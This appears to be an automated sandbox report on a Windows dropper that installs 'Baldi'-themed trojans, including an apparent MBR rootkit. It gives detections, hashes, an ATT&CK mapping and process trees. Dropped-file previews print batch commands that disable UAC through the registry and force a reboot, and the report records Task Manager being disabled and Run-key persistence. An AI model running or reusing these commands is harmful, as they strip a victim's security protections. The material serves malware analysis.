Source: Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr

Binary or memory string: @Winapi@Windows@DOF_PROGMAN

Source: C:\Windows\System32\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405A2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405A2E

Lowering of HIPS / PFW / Operating System Security Settings

Disables the Windows task manager (taskmgr)

Source: C:\Baldi\Baldi.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Disables UAC (registry)

Source: C:\Windows\System32\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	12 Process Injection	21 Disable or Modify Tools	2 Input Capture	1 Security Software Discovery	Remote Services	2 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	11 System Shutdown/Reboot
Default Accounts	1 Scripting	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Modify Registry	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Scripting	NTDS	14 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	73%	ReversingLabs	Win32.Backdoor.DarkComet
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Baldi\Baldi.exe	100%	Avira	TR/BAS.Samca.amdgw
C:\Baldi\kill.exe	100%	Avira	TR/AD.Nekark.sjwrf
C:\Baldi\mbr.exe	100%	Avira	DR/Delphi.Gen
C:\Baldi\kill.exe	100%	Joe Sandbox ML
C:\Baldi\DisableUAC.exe	100%	Joe Sandbox ML
C:\Baldi\Baldi.exe	70%	ReversingLabs	Win32.Trojan.Samca
C:\Baldi\DisableUAC.exe	21%	ReversingLabs	Win64.Trojan.Generic
C:\Baldi\kill.exe	75%	ReversingLabs	Win64.Trojan.Nekark
C:\Baldi\mbr.exe	71%	ReversingLabs	Win32.Rootkit.Abobus

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nsis.sf.net/NSIS_Error	file.exe	false	high
http://nsis.sf.net/NSIS_ErrorError	file.exe	false	high
https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-Ang	Baldi.exe, 00000003.00000002.637111077.0000000002E0A000.00000004.00001000.00020000.00000000.sdmp	false	high
https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-A	Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	false	high
https://vk.com/endnet	Baldi.exe, 00000003.00000002.637111077.0000000002EEC000.00000004.00001000.00020000.00000000.sdmp, Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	false	high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	882703
Start date and time:	2023-06-06 17:15:38 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal92.rans.evad.winEXE@19/8@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 93.5% (good quality ratio 69.2%) Quality average: 53.3% Quality standard deviation: 39.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 47 Number of non-executed functions: 99
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:16:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GG.exe C:\Baldi\Baldi.exe
17:16:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GG.exe C:\Baldi\Baldi.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Baldi\7note.mp3

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	Audio file with ID3 version 2.4.0, contains:\012- MPEG ADTS, layer III, v2, 160 kbps, 22.05 kHz, Monaural
Category:	dropped
Size (bytes):	248823
Entropy (8bit):	7.546210558954595
Encrypted:	false
SSDEEP:	6144:+vlzl1lcxbHrXiUl8vr6kSWyYqaaBh6P8IkxR/3t:+vlVQl8vr6LH1B//t
MD5:	6D5F23F17EE8EA50408555EB4BB5BE89
SHA1:	267B0E75E69405B8472654FE7327E4F4D70782B6
SHA-256:	69D1A8275264511E2FB77EAC49F0F64494C2BEB1752AAE347CDFF47CB587C1E4
SHA-512:	50A50A5C42A5C1D44AB42B1BBE5981A0FF6BE6C57AF010B9206E1432516F9589DFC889BC5246F00A595ECD5B879ACF1A1F1059E44662E25827B46384ACB66E0F
Malicious:	false
Preview:	ID3.......TXXX.......major_brand.mp42.TXXX.......minor_version.0.TXXX.......compatible_brands.isommp42.TSSE.......Lavf55.21.100........................Info...........m.............!%'),.2469;=ACEHJMPRUWY]_bdfilnqsvy{~..................................................Lavf55.21.100........$...........................................................................................................................................................................................................................................................................................................................................................................................H....LAME3.99.5UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUULAME3.99.5UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

C:\Baldi\Baldi.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13049579
Entropy (8bit):	5.758905606569735
Encrypted:	false
SSDEEP:	98304:4PyiUHCa1abtUvA5b1PSqhRLuaY673+/4ByCNlFSB+sgpDhsfC2PDORalZLCwpo3:ww2U4tuWbDa9PY
MD5:	515BC425DAA9558E4A12A917E7DFC701
SHA1:	BEF7A2A3F78189922BE2B1F59B9E2636C6A8156E
SHA-256:	FD27FB8B14A5FA99BBA87560510030A5AB9DF47E4F7584CB4D0E31C04E11808B
SHA-512:	41B2B95AEA7ED7BC039F64146581BA695AF8A441CFB7CBA989D2204FE47F8DE974334C224A085F30FBC3FC51455986A73C3BDB90952F1E7BC9B6C8074432DBDC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1]\.................^"........v"......."...@..............................................@....................#.......#.N1....'.......................$.H.....+.......................$.......................#.......#.<....................text...lD"......F"................. ..`.itext..d....`"......J"............. ..`.data...d....."......b".............@....bss.....e... #..........................idata..N1....#..2....".............@....didata.<.....#......*#.............@....edata........#......6#.............@..@.tls....H.....#..........................rdata..].....$......8#.............@..@.reloc..H.....$......:#.............@..B.rsrc.........'......:&.............@..@.debug........+.......+.............@..@................

C:\Baldi\CleanZUpdater.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.528650179702277
Encrypted:	false
SSDEEP:	3:mKDDlR+aRMgACL+aROWuM8AC:hOaSgNiaZRC
MD5:	B54E64A1F0B58D09CF57D983D7BA7361
SHA1:	D6C36454390BE4EEA41512BD39A9C68D77F614BF
SHA-256:	2683D451AB3423E25BCBECA902E6B586D0D9E8689C9C1BB6DCA47BFAE547A7D7
SHA-512:	583A6B07D584A433A78C8A948807CAF5D1BFA0A1B8EF6DCF5A7F67DB38E03BAF875CABDC91F974276295C01485B78C11002B4CF10F08346AB92C2375479BEB0A
Malicious:	false
Preview:	@echo off..Start C:\Baldi\Baldi.exe..Start C:\Baldi\DisableUAC.exe

C:\Baldi\DisableUAC.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	6.27337799955346
Encrypted:	false
SSDEEP:	1536:lD5s9u/O4wppE7b6Ca9wOxibBjPm8YEZDVAguwWx4c6fFSq35t:3s9uWfE7mt+BzXYEZDVAgVWuc69Sq35t
MD5:	9AD923E0B582D7520DBD655C36C1CDD5
SHA1:	189C9B2C40F0A84AF365E0BB8B88E97243560CC3
SHA-256:	F5ADD589DA4BFB1492531306D12E84EF27BFCB0C31FF51FED710215765AC95F4
SHA-512:	EA73A7E5262FD148BC8B5D7D5A7C20A1C6683DEFB7C2EA48CDC22595420307B18CA20ECAF1135AD24131D2AB6CE1346E3ABF78ABED0E2728878C0F993509FB0C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...NK.X........../....2.D...X.................@........................................................................................................(....`..d....................................................................................................code....D.......F.................. ..`.text........`.......J.............. ..`.pdata..d....`.......H..............@..@.rdata...!......."...Z..............@..@.data....*...........\|..............@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Baldi\kill.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	107520
Entropy (8bit):	6.299970440877681
Encrypted:	false
SSDEEP:	1536:pD5s9u/O4wppE7b6Ca9wOxibBjPm8YEZDVAguwWx4c6fFSqF4D:zs9uWfE7mt+BzXYEZDVAgVWuc69SqFc
MD5:	58F681015149CE6C120E5B9F55761D2C
SHA1:	A71E4A2E95493E69D9233C66E096C19B6AFD8147
SHA-256:	C09D5F30C31A01A4E0F8EA829278D8D4E99A20E122EACD7648E5C9C605256290
SHA-512:	0D6746DDF605AC718DC750E6E65131ECDE410B2548616C404D263C4647149DBFEA1922AAEF5277012D90A07B548AC7D9C9EDAB5DE38B54BB9CA8F7C1F1D16457
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...NK.X........../....2.D...\.................@.............................................................................................................`..d....................................................................................................code....D.......F.................. ..`.text........`.......J.............. ..`.pdata..d....`.......H..............@..@.rdata...!......."...Z..............@..@.data....*...........\|..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Baldi\lol.png

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PNG image data, 700 x 394, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	151955
Entropy (8bit):	7.990244705539055
Encrypted:	true
SSDEEP:	3072:dB1lj5X8Ll5YSBw08P47iGR64EjueyjjPQ3FKxu6aSNKkfM7xBTLmtoNDFuSzbDe:f9e5YjN4zR6paM77LPN5uSzb4WG
MD5:	41C46F443E8EE13BFAA86399EB6EE3F8
SHA1:	E1DE323885E86321591D6B31C3354FE2F7236510
SHA-256:	88135E8CED1DDD25E2D92FBC5AB19B5C251CD8FDB8303CF4026EC644A989A8AB
SHA-512:	E638200B40A19FE282DD7F1BA38558BD02D81F7DD10765E0207E2B2F77B9840848C8A9982092D02E76DEA76C12B3EF6DB5C9F8EE896B8AEEA475F9118D32AC18
Malicious:	true
Preview:	.PNG........IHDR..............q.n....sRGB....... .IDATx^.y.de}..9k.Zn.]{_h.........!...3..3...h.8....q...DG.......8.0.D$. .%.,-.....M..........G...NW.{.....y..T../.........8.Q(...B.P.f.q..iDQ..w..}.(.J.......aH...4M...(.....m.....R...}......(..]z.yy.8&.C.0$......0..]..u.M..4-._F...z.82b^a..-..i...eYX..i....a.s...A..y.Q...:.e.8...$.j..u... .0Q(...B.P...I.R..C.....l.m[...100.a...G..TUl.^..E1....!q...\Zr..OYp...b8!..i...@...NtBre!.b+>.....+DWL#..b.\..eY...//.<......uR.P(...B..#..._fbb..W3==M...N.X.T...C.V!.#..b....><.C.=...+.4. .... ..D.X..%X.....S....\1..d.0......%:..d:B.......c..Z..L&.6...]#.....-....W.P(....FH.....V..v...K.2K&.l.2..*G..`..k.A.T ...XhZ...;...X\....F...q.1z..A"..r.+/.,...nZ..d.T.y^I.U......r.X...z.........N..N.F...^.B.P(....M...R..W^E.R.\.3:z..+WR.T...b..A6n<...1;;M..cll..8..3)...T..kNn....m.\9. -.i..sn..tTT.... ..\|.7..`.v[.7-...'.).s.'.by."b+$WNOH../.<n..h.<%.B.P(...kF........3....I..P..=..3..._..v..f..X.....=...........

C:\Baldi\mbr.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	5.173437012266276
Encrypted:	false
SSDEEP:	768:4eMSZqVQuw+qdWSMzKAX9DCn4PLbz5DnNSN4at2bhBXuY8xX:TZqVQcZzXJC2ClktoZxX
MD5:	74E58B34423DDF2A72789D9927C5578D
SHA1:	4F43E0E17BF802CA32A55FCD0612F1A16A14F9DC
SHA-256:	28DEDDCA10A4D9081BDF3BAB9E7E66A53B5DE493B062B1FD124BDF41F386AED1
SHA-512:	6CFC02BF6C46E2219B2A8FEE45D8E537DC86B6563FD6E94FA72ABDAFEDC8B1A1B44A537EFE9BCDA011426585D82AB17E7C8025A1E7A44271A63D8ABE0E904F59
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p...\|.......~............@..........................P......_?...........@................................... ... ......................p...................................................................................CODE.....o.......p.................. ..`DATA.....C.......D...t..............@...BSS......................................idata..............................@....tls.....................................rdata..............................@..P.reloc..p...........................@..P.rsrc.... ... ..."..................@..P.............0......................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat

Download File

Process:	C:\Baldi\DisableUAC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	5.385562223264799
Encrypted:	false
SSDEEP:	3:NNgnzKDDEFkhhPk6pdgLxqrZfyM1K7eB/k+7W1nEHfnKyMhF6LFsIlGFIYh9n:NS0QePzYLxiH1jhRiRe66ibFpz
MD5:	A708B066FDA65F8D7F94A2CBD4919B0F
SHA1:	5C723E4F1BA46B5CB6813B5DB490DD63748CB07C
SHA-256:	754D5B111EC7225C4D643142DDF0DFAAB585F12B2F69BCCA088ABBD0D23A5A79
SHA-512:	75B7A6401EBFB2AA9194FF3EF48F8C23044342DDB2F2B9B33020B6EC7592DD2A1B0546EF7387641FB17CCCD7F726FE665386C471F01B4E715D7E9B713BAA1BC5
Malicious:	false
Preview:	@shift /0..@echo off..reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f..shutdown -r -t 1 -c "BALDI EVIL..." >nul..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.989999812901478
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	4444053
MD5:	e2c4c4dd8c6a357eca164955a8fe040c
SHA1:	f4114815bce62efbc78c79f9a83ccf74a4ea075c
SHA256:	f3efe3b57a0f5cc46963dbd8832ceecd5768117685b4cee684b1235d9e74ebe5
SHA512:	389bf398f9f9f6ae7e6dfca835f5877befa4ebfee5938d4b50728d77fb0450b2eb2cb67e3f4d9abaaad77231754968b27c69a510448dfd7f52c63b1ce3a1c3e1
SSDEEP:	98304:3c9jNgez/S9bL+M0QVtYD0JCqfZlVcc9uNSwfrNaSQHbfU0qC:s95zk0mtyTqj6W4SGYSQ/qC
TLSH:	A326338694B17BDBFA050133A1793EA9796BFCE7D54A040A14DEB4E13DF3983026BC91
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^.........

File Icon


Icon Hash:	1da6b3b3a28ecd71

Static PE Info

General

Entrypoint:	0x4030fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B1AE3CC [Sat Dec 5 22:50:52 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fa974366048f9c551ef45714595665e

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409160h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B0h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [0042EC18h], eax
call 00007FF8F0C45416h
mov dword ptr [0042EB64h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 00428F98h
call dword ptr [00407158h]
push 00409154h
push 0042E360h
call 00007FF8F0C450C9h
call dword ptr [004070ACh]
mov edi, 00434000h
push eax
push edi
call 00007FF8F0C450B7h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00434000h], 00000022h
mov dword ptr [0042EB60h], eax
mov eax, edi
jne 00007FF8F0C4282Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00434001h
push dword ptr [esp+14h]
push eax
call 00007FF8F0C44BAAh
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007FF8F0C42885h
cmp cl, 00000020h
jne 00007FF8F0C42828h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FF8F0C4281Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x74b0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x39000	0x1da18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5c4c	0x5e00	False	0.6697140957446809	data	6.440105549497952	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x129c	0x1400	False	0.43359375	data	5.046835307909969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25c58	0x400	False	0.5849609375	data	4.801003752715384	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2f000	0xa000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x39000	0x1da18	0x1dc00	False	0.5146320246848739	data	6.109333894738636	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x39190	0x1d3a8	Device independent bitmap graphic, 170 x 340 x 32, image size 115600	English	United States
RT_DIALOG	0x56538	0x100	data	English	United States
RT_DIALOG	0x56638	0x11c	data	English	United States
RT_DIALOG	0x56758	0x60	data	English	United States
RT_GROUP_ICON	0x567b8	0x14	data	English	United States
RT_VERSION	0x567d0	0x244	data	Russian	Russia

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 3320, Parent PID: 3452

General

Target ID:	0
Start time:	17:16:36
Start date:	06/06/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	4444053 bytes
MD5 hash:	E2C4C4DD8C6A357ECA164955A8FE040C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5724, Parent PID: 3320

General

Target ID:	1
Start time:	17:16:37
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5744, Parent PID: 5724

General

Target ID:	2
Start time:	17:16:37
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Baldi.exePID: 3156, Parent PID: 5724

General

Target ID:	3
Start time:	17:16:38
Start date:	06/06/2023
Path:	C:\Baldi\Baldi.exe
Wow64 process (32bit):	true
Commandline:	C:\Baldi\Baldi.exe
Imagebase:	0x400000
File size:	13049579 bytes
MD5 hash:	515BC425DAA9558E4A12A917E7DFC701
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 70%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: DisableUAC.exePID: 7140, Parent PID: 5724

General

Target ID:	4
Start time:	17:16:40
Start date:	06/06/2023
Path:	C:\Baldi\DisableUAC.exe
Wow64 process (32bit):	false
Commandline:	C:\Baldi\DisableUAC.exe
Imagebase:	0x140000000
File size:	106496 bytes
MD5 hash:	9AD923E0B582D7520DBD655C36C1CDD5
Has elevated privileges:	true
